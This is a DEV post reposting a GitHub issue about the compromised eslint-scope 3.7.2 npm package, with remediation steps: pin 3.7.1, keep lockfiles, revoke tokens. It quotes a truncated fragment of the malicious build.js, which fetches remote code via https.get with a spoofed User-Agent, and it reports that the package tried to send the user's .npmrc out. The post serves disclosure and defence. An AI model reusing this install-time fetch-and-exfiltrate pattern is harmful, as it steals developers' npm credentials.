Virus in eslint-scope 3.7.2

twitter logo github logo ・1 min read

I came across this issue and figured I shared it here.

Virus in eslint-scope? #39

pronebird avatar
pronebird commented on Jul 12, 2018

Update from the maintainers

Incident status report from npm

Please follow the comment by @platinumazure that gives a little insight into what happened:

It also appears that the same code was published in eslint-config-eslint@5.0.2, which has also since been unpublished. See for more information.

In the meantime

  1. Pin the version of eslint-scope to 3.7.1, one way is to add the resolutions to your package.json
  "resolutions": {
    "eslint-scope": "3.7.1"

Verify the dependency version with yarn list eslint-scope. It should print out eslint-scope@3.7.1

  1. Use package-lock.json or yarn.lock and have it in your repo if possible. Do not upgrade to 3.7.2 even if yarn outdated shows that there is a new version available.

  2. Revoke your NPM token as suggested in the comment below You can do the same by logging in to, selecting the "tokens" menu from the account dropdown and removing all tokens listed on the page. Make sure to recreate the relevant tokens if you hook your NPM to external services.

The issue

I don't know what the hell this is but it looks like a virus to me:

[2/3] ⠠ eslint-scope
error /Users/pronebird/Desktop/electron-react-redux-boilerplate/node_modules/eslint-scope: Command failed.
Exit code: 1
Command: node ./lib/build.js
Directory: /Users/pronebird/Desktop/electron-react-redux-boilerplate/node_modules/eslint-scope

SyntaxError: Unexpected end of input
    at IncomingMessage.r.on (/Users/pronebird/Desktop/electron-react-redux-boilerplate/node_modules/eslint-scope/lib/build.js:6:10)
    at emitOne (events.js:116:13)
    at IncomingMessage.emit (events.js:211:7)
    at (_stream_readable.js:475:10)
    at flow (_stream_readable.js:846:34)
    at resume_ (_stream_readable.js:828:3)
    at _combinedTickCallback (internal/process/next_tick.js:138:11)

The contents of a suspicious file:

    var https=require('https');
    https.get({'hostname':'',path:'/raw/XLeVP82h',headers:{'User-Agent':'Mozilla/5.0 (Windows NT 6.1; rv:52.0) Gecko/20100101 Firefox/52.0',Accept:'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8'}},(r)=>{

The URL it attempts to load is

Also it attempts to send my .npmrc somewhere.

This is version 3.7.2 that's been published an hour ago.

package managers are a surprising medium to spread viruses, especially when the virus is latched onto a dependency of babel-eslint 😱

twitter logo DISCUSS (1)
Classic DEV Post from Jan 29

CSS and JS Are at War, Here’s How to Stop It

There are a lot of people who love both JS and UX/CSS. If we stop labeling people just as “JS developers” or “UX developers”, we can achieve a ceasefire in the current “JS vs. CSS” war and achieve a mutually benefiting peace.

Mac Siri profile image
I'm a refactor-loving developer and I promise you I have nothing to do with Apple's Siri. now has dark theme. 🌝

Go to the "misc" section of your settings and select night theme

P.S. You can also change font to sans serif, which a lot of folks prefer. 💖